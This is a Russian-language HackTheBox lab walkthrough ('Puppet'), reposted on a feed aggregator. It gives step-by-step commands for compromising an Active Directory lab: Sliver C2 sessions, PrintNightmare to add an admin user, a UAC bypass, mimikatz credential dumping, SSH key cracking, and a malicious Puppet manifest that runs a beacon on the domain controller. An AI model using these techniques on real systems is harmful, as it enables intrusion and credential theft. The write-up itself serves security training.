惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
www.infosecurity-magazine.com
www.infosecurity-magazine.com
博客园 - 聂微东
博客园 - 【当耐特】
Last Week in AI
Last Week in AI
量子位
S
SegmentFault 最新的问题
Hugging Face - Blog
Hugging Face - Blog
B
Blog RSS Feed
V
V2EX
酷 壳 – CoolShell
酷 壳 – CoolShell
雷峰网
雷峰网
GbyAI
GbyAI
Jina AI
Jina AI
宝玉的分享
宝玉的分享
腾讯CDC
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
D
Docker
博客园_首页
N
News and Events Feed by Topic
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Help Net Security
Help Net Security
Recent Commits to openclaw:main
Recent Commits to openclaw:main
C
Cisco Blogs
F
Fortinet All Blogs
SecWiki News
SecWiki News
AI
AI
S
Schneier on Security
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
The Last Watchdog
The Last Watchdog
Martin Fowler
Martin Fowler
A
About on SuperTechFans
T
Troy Hunt's Blog
P
Proofpoint News Feed
Blog — PlanetScale
Blog — PlanetScale
Hacker News: Ask HN
Hacker News: Ask HN
F
Full Disclosure
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
I
InfoQ
S
Security @ Cisco Blogs
Project Zero
Project Zero
Simon Willison's Weblog
Simon Willison's Weblog
C
Cyber Attacks, Cyber Crime and Cyber Security
J
Java Code Geeks
N
News | PayPal Newsroom
IT之家
IT之家
大猫的无限游戏
大猫的无限游戏
H
Hacker News: Front Page

Все публикации подряд на Хабре

Ловим музу за клавиатуру: как айтишнику стать автором Что умеет Midjourney в 2026? Мой немного грустный разбор этого шикарного инструмента Никто не любит писать тесты, но ИИ может исправить это IPv8 выглядит как мечта. Поэтому почти наверняка не взлетит Производители вернули в продажу материнки с DDR3. Что происходит? Управление агентом с телефона через Telegram теперь в KodaCode От координации к лидерству: как меняется роль руководителя разработки Я сделала родителям бизнес вместо пенсии: зарабатываем 70 тысяч, мама не даёт продать В три раза быстрее приемка товара и оптимизация трудозатрат на 73%: как «РСТ-Инвент» помог Gulliver Group ИИ-шечный мир победил? О влиянии искусственного интеллекта на игропром Кремль снижает давление на Телеграмм пока Европа строит интернет по паспорту Как CEO, CTO и CIO за 8 часов собрали ИИ-директора, который умеет держать позицию под давлением Как (не) потерять домен за выходные Вместо 8 разных VPS: как я организовал практику студентам на одном сервере Почему твой Open Source проект не замечают? R&D: искусство управления неопределенностью в разработке AI-дефляция: вакансий для разработчиков больше, а рост зарплат — худший за 15 лет Мы отдали управление роботами OpenClaw. Что из этого вышло Галактический ID: система идентификации для всех форм разумной жизни Шесть основ бизнес-анализа: начинаем с вопроса «Кто в игре?» Код-ревью, в котором дело не в коде Данные переехали. Команда — нет Системной подход к сдаче OSWE в 2025 Почему комната управления реактором покрашена в цвет морской пены 4 YAML-файла вместо PySpark: как аналитикам строить пайплайны без разработчиков LLM-агент для поиска свободных доменов: автоматизируем подбор Когда, зачем и как правильно начинать новую сессию в Claude Code? Как я заставил нейросеть писать макросы для FreeCAD Анатомия ИИ‑агента для подбора персонала. От тысячи резюме к топ‑10 за минуты Опыт разработчика как экономика внимания Автономность как точка невозврата: кто будет субъектом в цифровом будущем Обучение ИИ в «диких» условиях: как рутинные действия превращаются в датасеты Как измерить LLM для задач кибербеза: обзор открытых бенчмарков Где хранить код? Сравнение GitHub, GitLab и Bitbucket Математика объясняет, почему нормальное распределение встречается повсюду Почему ваш FinOps не работает: 12 тезисов от практиков Как подписать проектную документацию УКЭП с использованием бесплатных лицензий Pilot Адаптивное администрирование Sigla Vision Я грузил уран в бочки, а потом 20 лет строил ИТ в атомной отрасли Чем позвонить с Эвереста? История и обзор спутниковой связи. Часть 2 Как языковая модель помогает контролировать качество инструктажей по охране труда в металлургии Как не передать на desktop свой IP в РКН Анатомия SAP Privileges: как устроено управление правами в macOS MoneyDev: Сказка про три главных слова Обновлённый токенизатор видео K-VAE 2.0 от Сбера Как сделать диспетчеризацию дома на 1284 квартиры почти бесплатно Как мы разогнали железную дорогу Мы дали агентам рутину. Теперь надо решить — что делать с освободившимся временем Токсичный контент, промпт-хакинг и защита ИИ — всё о Guardrails для LLM Умный город начинается с точного взгляда: как «Фалькон Тех» меняет пространство к лучшему Навайбкодил приложение для анализа графов Почему Дюну так интересно читать? Упрощаем работу с рутиной или как стать Гендальфом Белым Деконструкция Go: CPU, RAM и что там происходит. Go Assembler база. Часть 1.1 Какие профессии исчезнут из-за ИИ, а какие появятся? И что с этим делать Как мы построили IT-отдел, где хочется расти: архитектурные встречи, прозрачные метрики и книжные подарки Rufler: Делаем из Claude Code автономный рой через один YAML-конфиг Sing-box и белый список приложений Как построить надёжный обмен сообщениями в микросервисах: лучшие практики для enterprise OpenAI строит MLM-пирамиду, а McKinsey и Accenture помогают ей в этом Дом, который не построил Фишер (Часть 2) «Сверхзвуковой математик» против «Вдумчивого логиста»: битва алгоритмов 3D-упаковки Мультимодальные модели – грубый и дорогой инструмент Разговоры ничего не стоят. Код тоже Проверки физических лиц: с кого начнет ФНС Топ-10 бесплатных нейросетей для создания видео в 2026 году Первые слои кода: как наши решения сегодня определяют архитектуру ИИ на десятилетия Разработка нового статического анализатора: PVS-Studio JavaScript Поиск уязвимостей ПО: базовый минимум или роскошный максимум Почему оценка персонала не работает как инструмент управления Как мы разработали ИИ-ассистента и сократили рутину продуктовой команды на 50% Как я ушел из найма, нажарил косточек и продал на маркетплейсах на 168 млн в год Когда 1С:ERP уже внедрена, а нормального производственного плана всё ещё нет Как я сделал Claude мультимодальным, подключив к нему Qwen Omni Как приглашение на вакансию мечты превращается в атаку Infrastructure as Code: философия и лучшие практики IaC Тестируем Yandex Code Assistant на задаче, в которой нужно хранить секреты nxs-universal-chart v3.0: новое поколение универсального Helm-чарта Callback Injection: Техника, которая отправила Microsoft Defender в глухой нокаут «Все идеи на стол»: митап как способ вывести проект из тупика Сегодня я узнал нечто новое о GPU благодаря багу в своей игре Как заставить LLM ̶ ̶г̶а̶л̶л̶ю̶ ̶ эволюционировать Карта событий как фундамент аналитики: практический кейс для E-commerce Что выбрать для AI: x86, ARM или RISC-V? Дайджест железа за март Роль соматических мутаций в развитии аутоиммунных заболеваний: путь к избирательной терапии Mythos от Anthropic — тревожный сигнал для всех, а не только для банков Guardrails для LLM на Java: как приручить промпт‑инъекции и токсичные ответы Green-VLA: как мы собрали VLA-модель для реального антропоморфного робота и не потеряли обобщение Финансовая гонка вооружений: почему умные люди добровольно в ней участвуют Эра ИИ-агентов наступила: выбираем лучшего цифрового сотрудника # Практический опыт внедрения WinCC Redundancy на производственном предприятии Сделал MVP за 3 дня, а потом неделю прикручивал оплату. Оно того стоило? Физика против Маска: почему Starship V3 может оказаться ещё одной катастрофой Нефть Венесуэлы: крупнейшие запасы в мире, но не крупнейшая нефтяная держава JPA 4. Переосмысление Hibernate Почему зеркальная фотокамера Nikon D5 десятилетней давности идеально подошла для миссии «Артемида-2» Проект «Уровень-Спутник» или как мы сделали платформу для гидрологов «Замедлиться, чтобы ускориться»: почему ИИ повышает цену ошибок в требованиях и архитектуре Как с нуля поднять трафик IT-компании на 1657% при бюджете 55 тыс. и выжить Pixel-perfect Downsampling — идеальная отрисовка 50 миллионов точек без потерь
HackTheBox. Прохождение Mini Pro Lab Puppet
Яша, просто Яша · 2026-05-25 · via Все публикации подряд на Хабре

Сложный

10 мин

8.9K

Про Puppet уже написано несколько прохождений и даже был снят стрим, поэтому я решил написать своё прохождение и устранить все ошибки с которыми я столкнулся.

Вам поручено провести проверку на проникновение в компанию Puppet Inc. Компания не разрешает передачу данных за пределы внутренней сети, поэтому внутри компании был создан сервер управления и контроля (C2), и сотрудник запустил вредоносную программу для имитации успешной атаки с использованием методов социальной инженерии.

Puppet — это небольшой сценарий Active Directory, в котором вы начинаете с уже работающего маяка Sliver C2 на внутренней системе. Он предназначен для отработки работы в рамках C2-инфраструктуры в современной, сложной гибридной среде.

Puppet разработан для специалистов по тестированию на проникновение и «красных команд», ищущих быструю и сложную лабораторию с уже настроенной C2-инфраструктурой для отработки операций C2.

Эта лаборатория «Оператор красной команды уровня I» познакомит игроков со следующими темами:

  • Перечисление

  • Перечисление и атаки на Active Directory

  • Эксплуатация инфраструктуры DevOps

  • Боковое перемещение

  • Локальное повышение привилегий

  • Ситуационная осведомленность

  • Операции C2

Puppet — это цепочка задач средней сложности на HTB, в которой вы используете фреймворк C2 Sliver для взлома небольшой среды AD. Вы начинаете с уже существующего маячка на файловом сервере, повышаете привилегии с помощью эксплоита print nightmare, а затем дампите учетные данные. Затем вы делаете боковое перемещение на систему Linux, которая выступает в роли сервера Puppet, по сути, управляя всей средой. Вы повышаете привилегии на сервере Puppet и используете это для горизонтального перемещения на контроллер домена, где снова извлекаете учетные данные, чтобы получить последний флаг.

Начнём со сканирования портов на единственном доступном компьютере (представьте, что компания предоставляет вам внутренний компьютер для тестирования):

Добавим наш айпи в файлик hosts.

sudo nano /etc/hosts

Проведем начальное сканирование выданного айпи masscan’ом.

sudo masscan -p1-65535,U:1-65535 10.13.38.33 --rate=500 -e tun0 > puppet.ms

У нас открыты 5 портов.

Просканируем их nmap’ом.

nmap -p21,22,8140,8443,31337 -sC -sV -oA nmap/puppet puppet.htb

Помимо FTP и SSH, мы видим порты 8443 и 31337, которые встречаются довольно редко. Давайте сначала проверим FTP, так как Nmap говорит, что к нему разрешен анонимный доступ.

Подключимся к 21 порту.

ftp puppet.htb

Посмотрим файлы и папки.

ls

У нас есть два файла, загрузим их себе на машину.

get red_127.0.0.1.cfg

get sliver-client_linux

Посмотрим скачанные файлы.

cat red_127.0.0.1.cfg

Это конфиг для подключения к С2 серверу.

file sliver-client_linux

Сам клиент для С2 сервера.

FTP-ресурс содержит конфигурацию Sliver, а также клиент Sliver для удобства. Эта компания уже настроила для вас C2-сервер, но не хочет предоставлять вам доступ к командной оболочке на сервере. Давайте попробуем подключиться. Проверив конфигурацию, мы видим, что по умолчанию подключение осуществляется к localhost.

Но так как порт для подключения находится на удаленной машине, то сделаем переадресацию портов.

sudo socat TCP-LISTEN:31337,reuseaddr,fork TCP:puppet.htb:31337

Сделаем файл клиента исполняемым.

chmod +x sliver-client_linux

Импортируем конфиг для С2 сервера.

./sliver-client_linux import red_127.0.0.1.cfg

Теперь запускаем сам клиент и подключаемся к серверу.

./sliver-client_linux

Выполнение команды beacons показывает, что к этому серверу уже подключен маяк:

beacons

Теперь мы можем либо взаимодействовать с маяком, либо переключиться на более быструю интерактивную сессию. В этой лабораторной работе я буду работать с сессией, но отмечу, что в реальных боевых действиях работа с маяком обычно предпочтительнее для целей уклонения. Маяки находятся в режиме ожидания между выполнением команд, и большинство C2-фреймворков применяют обфускацию во время этих задержек. При переключении на интерактивную сессию задержки больше не происходят, поэтому этот компонент уклонения теряется.

Будем использовать маячок fe2a6189.

use fe2a6189

Перейдем в интерактивный режим взаимодействия с маячком.

interactive

Нам открылась сессия — 9d4ae392.

Переключимся на сессию 9d4ae392.

use 9d4ae392

Теперь можем выполнять команды в системе.

Перейдем на рабочий стол Брюса Смита и заберет первый флаг.

cd C:\\Users\\bruce.smith\\Desktop

ls

cat flag.txt

Теперь перейдём к локальному перечислению. Прежде всего, просмотрев файловую систему, мы заметим, что Puppet установлен.

cd c:\\programdata

Посмотрим список файлов и папок.

ls

Видим, что есть Puppet и PuppetLabs.

Puppet — это инструмент для управления конфигурацией, в некотором смысле похожий на нашу систему управления и контроля (C2). Это означает, что где-то находится сервер Puppet, который управляет машинами в нашей среде. Далее нам нужно узнать, в каком контексте мы работаем — чтобы это увидеть, мы запустим объектный файл маяка sa-whoami (bof):

Установим пакет sa-whoami через armory.

armory install sa-whoami

Посмотрим, кем мы являемся в системе, группы и привилегии.

sa-whoami

Обратите внимание, что мы являемся пользователями домена из группы employees, но, похоже, не имеем никаких особых привилегий. Наш следующий шаг — сбор данных о среде AD с помощью Bloodhound. Для этого мы можем напрямую запустить сборку sharp-hound-4 из Sliver:

Перейдем в папку temp.

cd c:\\temp

Устанавливаем инжестор.

armory install sharp-hound-4

Собираем с помощью инжестора данные.

sharp-hound-4 -s -t 300 -- -c all,gpolocalgroup

Обратите внимание, что результат сохраняется в виде ZIP-архива на целевом компьютере, но нам все равно придется его загрузить:

Загружаем файл себе на ПК для анализа.

download 20260524015235_BloodHound.zip

Мы загружаем файлы в наш локальный экземпляр BloodHound, но не видим никаких особенно интересных путей.

В качестве следующего шага мы запускаем sa-adcs-enum bof, чтобы перечислить все потенциальные экземпляры ADCS.

Устанавливаем пакет sa-adcs-enum для работы с центром сертификации.

armory install sa-adcs-enum

Запускаем sa-adcs-enum.

Однако центров сертификации нет. Кроме того, мы перечисляем открытые порты локальной машины с помощью еще одного boof:

Установим бандл situational-awareness.

Но у меня не установился и выкинул ошибку на этапе установке sa-req-query.

Ничего особенно интересного не обнаруживается. В качестве следующего шага мы ищем локальные уязвимости повышения привилегий. Хороший скрипт PowerShell для этого — PrivescCheck от itm4n. Поскольку мы не можем напрямую получить доступ к машине злоумышленника с целевой машины, нам придется либо загрузить скрипт на целевую машину, либо разместить его на машине управления и контроля. В данном случае я выбираю способ загрузки:

Загрузим локально на kali чекер привилегий.

wget https://github.com/itm4n/PrivescCheck/releases/download/2026.01.30-1/PrivescCheck.ps1

Теперь загружаем с kali на сервер этот чекер.

Смотрим файлы.

ls

Установим sharpsh.

armory install sharpsh

Проверяем систему на локальные уязвимости.

sharpsh -t 300 -- -c invoke-privesccheck -u c:\\temp\\PrivescCheck.ps1

Машина уязвима для PrintNightmare из-за неправильной конфигурации! Существует множество способов эксплуатации этой уязвимости, для простоты я воспользуюсь PoC из этого репозитория - https://github.com/JohnHammond/CVE-2021-34527 . PrintNightmare, по сути, загружает DLL-файл, контролируемый злоумышленником, как SYSTEM, поэтому вы также можете создать свой собственный DLL-файл для прямой загрузки маяка Sliver. Однако PoC от Джона Хаммонда позволяет использовать предварительно скомпилированный DLL-файл для добавления нового пользователя-администратора. Хотя это легко обнаружить, это быстрый способ добиться желаемого.

Загрузим на kali эксплоит.

git clone https://github.com/JohnHammond/CVE-2021-34527

Перекинем его в рабочую папку.

cp CVE-2021-34527.ps1 ~

Перенесем эксплоит на машину.

upload CVE-2021-34527.ps1

Переключимся в шелл и загрузим скрипт CVE-2021-34527.ps1.

Import-Module -Name C:\Temp\CVE-2021-34527.ps1

Запустим эксплоит.

Invoke-Nightmare -DriverName "PrintMe" -NewUser "john" -NewPassword "RedPuppet123"

Проверим работу эксплоита.

net localgroup administrators

Поскольку мы добавили локального пользователя, входящего в группу администраторов, теперь мы можем использовать команду runas для переключения в его контекст, повторно запустив начальную полезную нагрузку маяка:

exit

Здесь нужно подождать.

runas -u john -P "RedPuppet123" -p c:\\programdata\\puppet\\puppet-update.exe

Посмотрим список маячков.

beacons

У нас появился новый маячок с именем <err> потому что мешает UAC.

Смотрим кто мы.

sa-whoami

Давайте обойдем UAC.

Клонируем репозиторий с обходом UAC.

git clone https://github.com/icyguider/UAC-BOF-Bonanza.git

Скопируем файлы в папку extensions С2 сервера.

sudo cp -rp /home/kali/UAC-BOF-Bonanza /home/kali/.sliver-client/extensions/

Перейдем в нужную папку для компиляции

cd /home/kali/.sliver-client/extensions/UAC-BOF-Bonanza/

Установим компилятор

sudo apt install gcc-mingw-w64-bootstrap -y

Исправляем ошибки.

sed -i 's/^\(\s*\)return;$/\1return 0;/' EditionUpgradeManager/src/EditionUpgradeManagerBOF.c

sed -i 's/\(CoGetObject.*&IID_IEditionUpgradeManager,\s*\)&Manager)/\1(void**)\\\&Manager)/' EditionUpgradeManager/src/EditionUpgradeManagerBOF.c

sed -i 's/&IID_IEditionUpgradeManager, &Manager)/\&IID_IEditionUpgradeManager, (void**)\\\&Manager)/' EditionUpgradeManager/src/EditionUpgradeManagerBOF.c

Компилируем.

make

Загружаем расширение.

extensions load /home/kali/.sliver-client/extensions/UAC-BOF-Bonanza/SspiUacBypass

Создаем нужную папку

mkdir -p /home/kali/.sliver-client/extensions/SspiUacBypass/bin/

И копируем нужный файл куда нужно.

cp /home/kali/.sliver-client/extensions/UAC-BOF-Bonanza/SspiUacBypass/bin/SspiUacBypassBOF.o /home/kali/.sliver-client/extensions/SspiUacBypass/bin/SspiUacBypassBOF.o

И повышаемся до системы

SspiUacBypass C:\\programdata\\puppet\\puppet-update.exe

Смотрим маячки.

beacons

Всё как и раньше.

use 0513a440

interactive

use 879a55d8

Забираем флаг с рабочего стола Администратора.

Скопируем мимикатз в домашнюю директорию

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .

Воспользуемся боковым загрузчиком, чтобы загрузить мимикатз в память.

Помимо хешей пользователя Брюса и самой машины, мы также получаем хеш нового пользователя: svc_puppet_win_t1. Вероятно, это учетная запись, которую Puppet использует для выполнения команд на серверах Windows первого уровня. Согласно собранным нами данным Active Directory, существуют также учетные записи svc_puppet_win_t0 и svc_puppet_lin_t1. Один аспект, который мы еще не рассматривали, — это общие ресурсы домена. Поэтому давайте сначала сделаем это из системной учетной записи (которая также является обычным пользователем домена — учетной записью машины сервера):

Поставим расширение для работы с шарами sa-netshares.

armory install sa-netshares

Смотрим шары на домен контроллере.

sa-netshares dc01

sa-netshares file01

К нестандартным общим ресурсам относятся «FILES» на файловом сервере file01, где мы уже являемся администраторами, и общий ресурс IT на контроллере домена. Давайте проверим, можем ли мы получить доступ к общему ресурсу IT:

ls \\\\dc01.puppet.vl\\it

У нас нет доступа к этому разделу. Давайте проверим нового пользователя, которого мы получили ранее. Это пользователь, запускающий службу Puppet, поэтому, не прибегая к механизму pass-the-hash, мы можем изменить конфигурацию службы для получения маяка, а затем вернуть всё обратно. Давайте сначала перечислим службы:

armory install sa-sc-enum

Смотрим все службы.

sa-sc-enum

Посмотрим службу puppet на file01.

armory install sa-sc-query

sa-sc-query file01 puppet

Установим расширение для работы с реестром

armory install sa-reg-query

К сожалению из-за этого расширения клиента выкидывает.

Теперь мы могли бы изменить путь запуска и перезапустить службу, но есть способ и получше.

execute -o -s -- c:\\windows\\system32\\cmd.exe /c sc config puppet binPath=c:\\programdata\\puppet\\puppet-update.exe

Запускаем службу.

execute -o -s -- c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -c "Restart-Service -Name puppet"

Теперь у нас есть новый маячок.

Но он быстро умирает, потому что мы загружаем файл маяка вместо службы, поэтому будем мигрировать в процесс.

Для начала посмотрим список процессов.

ps

И мигрируем в нужный нам процесс.

migrate -p 3140

Теперь смотрим кто мы.

whoami

С помощью нового маяка svc_puppet_win_t1 мы теперь можем вывести список общих ресурсов на контроллере домена, поскольку у этой учетной записи есть права доступа к ним. Теперь мы можем убедиться, что у нас действительно есть доступ, и немного осмотреться.

ls \\\\dc01.puppet.vl\\it

ls \\\\dc01.puppet.vl\\it\\.ssh

Загружаем себе эти ключи.

download \\\\dc01.puppet.vl\\it\\.ssh\\ed25519

download \\\\dc01.puppet.vl\\it\\.ssh\\ed25519.pub

Загружаем пингалку

https://gist.github.com/joegasper/93ff8ae44fa8712747d85aa92c2b4c78

Находим такие айпи.

Get-PingSweep -SubNet '172.16.40'

Проверим порты.

Test-NetConnection -ComputerName 172.16.40.5 -Port 22

Test-NetConnection -ComputerName 172.16.40.200 -Port 22

Из содержимого файлов мы узнаем, что это закрытый ключ SSH для учетной записи svc_puppet_lin_t1@puppet.vl (обратите внимание, что вам, возможно, придется изменить символы конца строки, поскольку этот ключ был получен с машины под управлением Windows). Хотя Sliver имеет функциональность для выполнения команд SSH с помощью маяка, мне не удалось заставить его работать. Поэтому мы собираемся настроить переадресацию портов для SSH с нашей машины злоумышленника. Теперь сделаем саму переадресацию портов в С2.

portfwd add --bind 2222 -r 172.16.40.200:22

Не забываем переименовать файлы.

mv '\\dc01.puppet.vl\it\.ssh\ed25519' ed25519

mv '\\dc01.puppet.vl\it\.ssh\ed25519.pub' ed25519.pub

Преобразуем ключ в хеш для подбора пароля.

ssh2john ed25519 > hash.txt

Теперь подберем пароль.

john hash.txt --wordlist=rockyou.txt

К сожалению площадка Хабры не даёт больше загрузить изображения, поэтому дальше пойдет только текст.

Меняем права на файл и преобразуем в нужный формат.

chmod 0600 ed25519

dos2unix ed25519

Подключаемся к системе и вводим пароль.

ssh -i ed25519 -t 'svc_puppet_lin_t1@puppet.vl'@127.0.0.1 -p 2222

Это сработало, и теперь у нас есть доступ к главному компьютеру Puppet Master. Посмотрим привилегии.

sudo -l

Перечислим машины, управляемые этой машиной посредством puppet:

sudo puppet cert list --all

Проведем повышение привилегий по инструкции https://gtfobins.org/gtfobins/puppet/

/bin/bash -p

Читаем флаг в домашней директории у рута.

Мы видим, что и file01, и контроллер домена управляются этим экземпляром Puppet Master. Хотя мы не знаем, под какими учетными записями работают агенты (кроме file01), можно предположить, что это, вероятно, svc_puppet_win_t0 для контроллера домена. Давайте найдем способ выполнить там команду:

Создаем нужные папки.

mkdir -p /etc/puppet/code/environments/production/manifests

Меняем права на папку.

chmod 777 /etc/puppet/code/environments/production/manifests

Создаем следующий файл.

nano /etc/puppet/code/environments/production/manifests/site.pp

node 'dc01.puppet.vl' {

exec { 'pwned':

     command   => 'C:\\Windows\\System32\\cmd.exe /c \\\\file01.puppet.vl\\files\\puppet-update.exe',

     logoutput => true,

   }

 }

 node default {

   notify { 'This is the default node': }

 }

Меняем права на файл

chmod 777 /etc/puppet/code/environments/production/manifests/site.pp

Применяем конфиг, не забывая положить файл в нужную папку.

Задача агента — отследить изменения. По умолчанию это происходит каждые 30 минут, но здесь агент проверяет состояние системы каждую минуту, чтобы помочь в эксплуатации уязвимости.

Вскоре после этого мы получаем сигнал от домена контроллера:

Переключаемся на нужный маячок и заходим на рабочий стол Администратора.

Это предоставляет полные административные права на контроллере домена, однако последний флаг находится не в обычном месте — на этой машине это пароль одного из пользователей. Поэтому нам придётся получить его из дампа учётных данных, т.е. последний флаг можно выгрузить с помощью SharpDPAPI.exe

wget https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/refs/heads/master/SharpDPAPI.exe

Загружаем SharpDPAPI.exe, переходим в шелл и запускаем.

upload SharpDPAPI.exe

Машина пройдена, можно забирать сертификат.

Полную PDF версию прохождения со всеми картинками можно забрать у меня в телегамм канале.